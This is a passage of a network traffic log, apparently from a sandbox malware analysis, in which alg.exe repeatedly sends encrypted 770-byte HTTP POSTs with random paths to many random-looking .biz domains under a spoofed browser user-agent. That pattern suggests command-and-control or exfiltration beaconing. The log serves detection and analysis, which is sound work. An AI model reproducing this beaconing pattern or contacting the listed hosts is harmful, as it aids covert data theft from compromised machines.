Jan 10, 2025 16:02:20.805706024 CET	770	OUT	Data Raw: 22 0a a9 b4 0a 17 72 ca f6 02 00 00 54 38 07 5e 91 3d 24 21 e4 49 6e 0d a2 52 43 47 af 83 f9 78 fc 7e d6 93 3b 8e 40 10 22 99 78 fa 5f 9a 2a 15 96 f6 39 5c 2f 8e 2a 8f 26 03 a2 b4 a3 27 a1 a5 90 f2 31 6d 7d ac 48 37 4a 0d 40 be 9c 67 79 e0 47 aa Data Ascii: "rT8^=$!InRCGx~;@"x_9\/&'1m}H7J@gyGP\|T@x+UDsbLA%jp&c4]mh&jdWin]1+;.n\|K)Z2:AA/[R+Vv&N\|)WVD1EyUD&4Im828
Jan 10, 2025 16:02:22.209798098 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ee6ddc3760c1a96a737aeee6bb7ba04a\|8.46.123.189\|1736521341\|1736521341\|0\|1\|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49895	13.251.16.150	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:22.451761961 CET	357	OUT	POST /ramdicwprogd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:22.451785088 CET	770	OUT	Data Raw: 8d 32 e3 22 e1 da 3e 55 f6 02 00 00 59 da d7 51 a4 35 0a f6 b9 80 f4 90 cd 07 c7 9d d9 ac 56 c1 f1 2d 18 4f fc cd b9 b7 5b b4 2e 50 97 78 cb 01 3e f4 c8 f4 20 5d 7f d3 09 b7 1f 01 ae dd 4f 7b 0a 27 5d 63 e4 43 d2 7d 48 fc 66 33 89 4b cb 3e f8 28 Data Ascii: 2">UYQ5V-O[.Px> ]O{']cC}Hf3K>(K.F-eYo4qyXH.CK)?z(H_D=:36l"X^$N q)4vGcjux\|bg%;PC}6J0])X
Jan 10, 2025 16:02:23.867443085 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ee95bac941027991c94d90975e3de886\|8.46.123.189\|1736521343\|1736521343\|0\|1\|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49909	18.246.231.120	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:24.203881979 CET	351	OUT	POST /edhrpwf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vrrazpdh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:24.203928947 CET	770	OUT	Data Raw: 28 0c d4 51 d0 20 bc 73 f6 02 00 00 f3 83 ee d0 d3 be ca f8 65 06 96 05 48 c3 73 00 7d 57 22 8c fd dd 88 d4 34 ac ca 0b 1a af ef 41 f9 57 34 da 47 9a e7 bf 82 de ad bf 48 2a 2a b6 59 9a a7 dd 00 83 a2 de a3 9f 6e 74 c6 aa b7 0d 94 b3 3d 7a c8 03 Data Ascii: (Q seHs}W"4AW4GH**Ynt=z<v3\|^C\|0R<;+uss.i".O`f@%Jw5/X%hQmy)y?pmjkua@'RjK9`)\=w(&
Jan 10, 2025 16:02:24.922045946 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=1e5094e52f8a8f3f874a8ce5bc4eeab9\|8.46.123.189\|1736521344\|1736521344\|0\|1\|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49915	47.129.31.212	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:25.107589960 CET	352	OUT	POST /nmcegkesku HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:25.107693911 CET	770	OUT	Data Raw: ce f5 1a cd 83 60 7e f3 f6 02 00 00 5a 9c 24 6a 3f ca 9b cf 88 4f fa 6a 99 ea b3 1f ed 41 3a 97 01 9f b3 99 15 26 19 c1 eb de 80 37 c8 4e 83 08 87 67 83 b9 e0 10 c4 35 10 37 a4 a4 03 ba 8a 2e db 18 33 0d 62 59 af e3 ac 31 92 be 86 0c cf f0 a2 e7 Data Ascii: `~Z$j?OjA:&7Ng57.3bY1F"#OOa-Dwha(.J58n'y1uvlK.V%84B%,8MZE/B/M2d3*'K~flu34
Jan 10, 2025 16:02:26.474149942 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d3b69dac54b5cd5cd152446ad43dbea1\|8.46.123.189\|1736521346\|1736521346\|0\|1\|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49926	13.251.16.150	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:26.654550076 CET	345	OUT	POST /wi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: typgfhb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:26.654578924 CET	770	OUT	Data Raw: 09 6c 9b 7b 43 a1 98 eb f6 02 00 00 3b a0 78 39 21 8a f3 fa 4c c0 8a cc 3f 31 1a 0e c3 21 01 c9 39 3d 46 20 44 1b 21 0e 3a 1f 1e 94 72 ff ac d7 00 d4 c3 ff d7 2a 06 02 5c 4c 7f 61 bb fa 51 94 3b 3c 7c c7 43 e9 24 fe 1f 25 70 ce f1 ea e5 20 02 0a Data Ascii: l{C;x9!L?1!9=F D!:r*\LaQ;<\|C$%p nohSiw-Y1aj#sin3K#_UAd-JqIVT0$]v344XJ>lm)kQ?Vu 4riA-d2Va}~]8T]qhB
Jan 10, 2025 16:02:28.057442904 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=544d3d10ea0d111d79b4d48bbee335d6\|8.46.123.189\|1736521347\|1736521347\|0\|1\|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49937	18.246.231.120	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:28.211441994 CET	352	OUT	POST /dwgeydrcwvx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: esuzf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:28.211474895 CET	770	OUT	Data Raw: 0d 20 d1 35 0f 20 02 46 f6 02 00 00 e6 d9 c7 ea 87 e4 cb aa db d2 16 b9 08 71 8c 31 9d eb bf 25 af b8 0b 5a 36 48 85 37 e1 3d 86 19 fd 15 ba 2f bf 5e ec a4 0e 41 bc 91 a2 ed b7 07 a8 0e e1 bb 7d c4 05 a3 1f b5 7e 75 8a 1d 91 86 2e b6 c6 f4 9c 26 Data Ascii: 5 Fq1%Z6H7=/^A}~u.&\|22k_ve5-nT3 h-i#vbVri]:jUV9W~`RNQco_eJR><Z]K%w*%4[J}S.F
Jan 10, 2025 16:02:28.930337906 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=4d442bf5e919f59802a7e7b90a7f8779\|8.46.123.189\|1736521348\|1736521348\|0\|1\|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49948	3.94.10.34	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:29.595441103 CET	352	OUT	POST /oyfrpxy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gvijgjwkh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:29.595441103 CET	770	OUT	Data Raw: af 73 cf 70 61 45 e0 ea f6 02 00 00 fa 45 af d4 a8 2d 94 91 99 d1 55 21 d4 12 01 b6 10 b9 d2 41 5a d4 ab da 21 9b ff 06 5f b7 a7 54 68 ce 43 d1 c6 42 8a ce 39 a0 74 ca 6b 7f 8a a8 21 1a 3a 2d fb a8 8b 7f 4b f7 87 44 da ea 77 8c 70 44 00 d3 80 fe Data Ascii: spaEE-U!AZ!_ThCB9tk!:-KDwpD#T.,50;TRoJcO7K#),"DRbIT#~r_9B4dOiYed4%+_$@#\|R $H58;*aP.\#)$ty
Jan 10, 2025 16:02:30.063750982 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c23d6a76c1d4e42567b36bdb9fc85759\|8.46.123.189\|1736521349\|1736521349\|0\|1\|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49954	18.246.231.120	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:30.356518030 CET	345	OUT	POST /ow HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qpnczch.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:30.356518030 CET	770	OUT	Data Raw: 25 aa 5d 2b fd 03 f1 d6 f6 02 00 00 12 af 2e 91 b2 80 d5 d8 fc f2 d3 32 f7 48 1a 4a 4f d9 25 c9 6d 01 f6 08 90 f3 a4 cd 0d 46 a7 bc 31 b0 d4 75 dc 9c 56 c2 17 8f 26 96 35 86 76 8c a0 0b af 86 82 dc 75 64 80 6f f2 83 2d ef e7 fc bd db 76 53 04 d3 Data Ascii: %]+.2HJO%mF1uV&5vudo-vS]`xr=xd{;9$%C\<r+CYGv3{,^vj26`m\|?-XpJjg:u.fXG=I-R>g-zFmrL&jVj
Jan 10, 2025 16:02:31.094607115 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b75e8194f88b2bff6274a2c1c04a9fec\|8.46.123.189\|1736521350\|1736521350\|0\|1\|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49963	3.254.94.185	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:32.223448992 CET	349	OUT	POST /vimpkpmj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: brsua.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:32.223496914 CET	770	OUT	Data Raw: dc 92 f4 30 87 d2 af ca f6 02 00 00 be d7 06 31 6d 25 08 41 51 00 c0 ff bd 35 14 23 57 d2 2d cd 52 52 6b 49 02 f7 77 47 44 86 19 1a d0 ee 9c a8 95 d6 c9 4a e5 e5 ce 78 cf 17 b4 02 a7 00 1b c3 11 ee 1b 88 33 bd fb c9 ec 2f 74 b7 b6 77 9c c3 b8 17 Data Ascii: 01m%AQ5#W-RRkIwGDJx3/twKGrT@Np53/D\|nTp 1G(B&zyk?9jZ{hsDu-\<5Ew][l"&\|'ao`-vP[ym
Jan 10, 2025 16:02:32.979969978 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2fafa5efc95c80ef1c328dcc6b22ce98\|8.46.123.189\|1736521352\|1736521352\|0\|1\|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49968	85.214.228.140	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:33.035773993 CET	359	OUT	POST /pffrbkpnttaxats HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dlynankz.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:33.035773993 CET	770	OUT	Data Raw: 83 93 3c e1 81 a5 1e 31 f6 02 00 00 4c e8 a3 3e db ec 8a f5 d6 a6 57 11 ba a7 34 42 1a 3f b5 d2 49 0d 9c dc b5 44 7b f1 0a d4 9e ac b0 36 32 29 5c 61 33 a4 04 d1 b0 dc 5a 75 6b 69 f3 c7 b4 75 6b f1 64 83 cc 69 a3 87 f7 46 47 b0 b0 3b c9 3c b3 4b Data Ascii: <1L>W4B?ID{62)\a3ZukiukdiFG;<K[eyl:j\tjBER1T#n"AFl 8N*QnfN%.rYz&QDFHb}3%O4%x^ jM^fBOG!LOD
Jan 10, 2025 16:02:33.665944099 CET	176	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 10 Jan 2025 15:02:33 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Jan 10, 2025 16:02:33.697830915 CET	346	OUT	POST /bc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dlynankz.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:33.698009014 CET	770	OUT	Data Raw: 61 8c 0d f3 b3 0b 6e 73 f6 02 00 00 82 d5 1d 80 df dc db 73 96 db c3 9b f9 59 7b c9 1c 95 16 8e ab 6f 4a 1d dc 1f 14 01 28 89 6d c6 07 0c 8f b5 5b 15 6f 05 e6 8b 15 f6 ba 9b 30 0f a3 83 e7 f5 9d 15 a3 59 9a 52 45 e8 7a 4b a4 60 ef 85 4d de 7d 24 Data Ascii: anssY{oJ(m[o0YREzK`M}$ ?~}[u}%N5f7W+>EiZN;CyVuTIGr 4"xy2[qTvG<Y\|2#O4T~)HM1{,yN}j3]Vn"%R
Jan 10, 2025 16:02:33.891940117 CET	176	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 10 Jan 2025 15:02:33 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49973	47.129.31.212	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:33.939579964 CET	352	OUT	POST /kkffexjgr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oflybfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:33.939599991 CET	770	OUT	Data Raw: a8 aa 62 31 4d 0c 89 17 f6 02 00 00 d2 e8 c6 f5 38 cb 49 da 48 a4 b1 19 42 f7 b1 c3 11 17 30 93 a0 27 c6 84 b4 34 43 05 8c 9d 0e 76 5b 70 35 69 be 2d b0 4f 99 fb 58 f1 f8 3c f8 db b1 8a f2 7c 4f a1 74 b6 ef e8 ce bc 77 3e 01 95 d3 dd 53 9e 1f 85 Data Ascii: b1M8IHB0'4Cv[p5i-OX<\|Otw>SpPG\|x^YNp;cV/aHm7/pe6'MVMM_otu^K+(6i(~]$SEAU#]e6]6W^k?[>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49979	47.129.31.212	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:35.294368029 CET	349	OUT	POST /afgoll HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oflybfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:35.294368029 CET	770	OUT	Data Raw: 15 37 dd 77 f6 c5 df af f6 02 00 00 e6 d8 ad c4 ff 4b b2 12 d4 e3 8c 84 cb f0 ff e5 9e 3f 2b d9 ce c0 ac 26 db e1 81 3d 53 08 5d 90 45 18 75 cc 96 ed 6a 4c e8 f6 8c 39 5a ff 3a af 2e 67 a3 88 af ea 1f 41 c8 63 43 72 a3 95 ed 8a c4 83 bf 80 e6 91 Data Ascii: 7wK?+&=S]EujL9Z:.gAcCrX}>jWy"Ea3B!!^\|g\X]o?N}@vIJ{sE3?aC.N=Kar&R#hOgB8Aa:zY
Jan 10, 2025 16:02:36.713551044 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f134c358d49681a2c9802e0c215170b2\|8.46.123.189\|1736521356\|1736521356\|0\|1\|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49990	18.246.231.120	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:36.773049116 CET	357	OUT	POST /uuetgwffqxlqakrc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yhqqc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:36.773099899 CET	770	OUT	Data Raw: 4f ca 99 5b b3 43 7e fe f6 02 00 00 36 af f9 ad a8 f0 0c 65 1b 9a 7d 24 69 f7 c4 eb e2 8f d7 8c f5 5f 3a dc f9 aa 63 4d 9d 04 04 a7 53 10 34 b7 ba 1b b8 42 78 bd 08 45 17 e8 f0 54 98 ec 86 0f 67 5e 62 ba 06 54 09 ca 2f b3 49 d6 cc c2 2a a4 cb 9b Data Ascii: O[C~6e}$i_:cMS4BxETg^bT/I*>j<0D!BMJyk.@Mp"T:ilIa#P95:Cl5aMmYe:@mj&1Z.9]jX[-Em#AEJ%82vfnoof/Iv'
Jan 10, 2025 16:02:37.499875069 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=4261bfe127f7ba1fef7c03ecdb5269f4\|8.46.123.189\|1736521357\|1736521357\|0\|1\|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49996	47.129.31.212	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:37.546943903 CET	355	OUT	POST /bbjmfesvmurxh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: mnjmhp.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:37.546972990 CET	770	OUT	Data Raw: 91 3a a4 22 a5 95 07 de f6 02 00 00 3d 98 3e 5f 77 ca e7 cb 1b b7 b7 bd 7d 32 20 3a 25 c1 c3 f2 33 8c 86 9b fb d6 18 6e 53 f0 48 e6 ac 28 cb f1 d5 bf c4 a9 8e 13 0b 10 7f ff ae 10 e1 ab 7e 61 47 9b 71 18 a6 5e e9 a4 7b 5c 06 fe 40 21 a5 62 e1 69 Data Ascii: :"=>_w}2 :%3nSH(~aGq^{\@!bi?$"Kbi9\|\<bgMo $,>815OGzOW$/URrb >HWW-WDj4m'o
Jan 10, 2025 16:02:38.914217949 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f73cf99e275366fadd9d88aca8ab60ac\|8.46.123.189\|1736521358\|1736521358\|0\|1\|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50007	34.227.7.138	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:38.961498022 CET	357	OUT	POST /earflafsrpsf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: opowhhece.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:38.961519003 CET	770	OUT	Data Raw: cb e5 63 3c a9 a6 52 14 f6 02 00 00 22 ac 3a ad dc b2 19 9c dc 54 21 ca 70 6f 8c 2f f3 36 ec 1a da ac 8d 71 aa ef 48 5b d0 f9 14 86 44 62 ff aa 0f d8 5e 36 ad 8f 7e b3 9c ab c4 33 69 18 6c c5 1d 57 16 ea d4 b5 c9 5d 14 84 34 e1 56 76 56 b4 be a8 Data Ascii: c<R":T!po/6qH[Db^6~3ilW]4VvV[v+_,1ld3<yYA_BAP<@h~{PtC\\|0+K+]q 2n:!Tuy[SW6z~iI)_GKB&tEd+(Eu\|7UBp>$ky?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50010	34.227.7.138	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:39.178652048 CET	361	OUT	POST /elhpchftdggocnkd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: opowhhece.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:39.178652048 CET	770	OUT	Data Raw: df 3d 35 85 9a 3c e5 ac f6 02 00 00 83 07 1d 0b 17 ee be 40 44 09 1a 3f 87 dd 32 ef db cd c4 ac 12 e8 a9 84 10 3d 57 82 48 48 e8 11 54 eb 7b a0 37 f7 2d 2d b2 ea c7 47 7c 8a f2 af 65 2c 9a 2c 40 c0 ec 72 f3 90 e3 04 df 70 f8 e9 29 75 c0 68 d2 e1 Data Ascii: =5<@D?2=WHHT{7--G\|e,,@rp)uhh^d\$9BiTWmud)z9J\@t^6j=}fhn3Cdq0QXQj/7X,.&yJPoU^Zg2
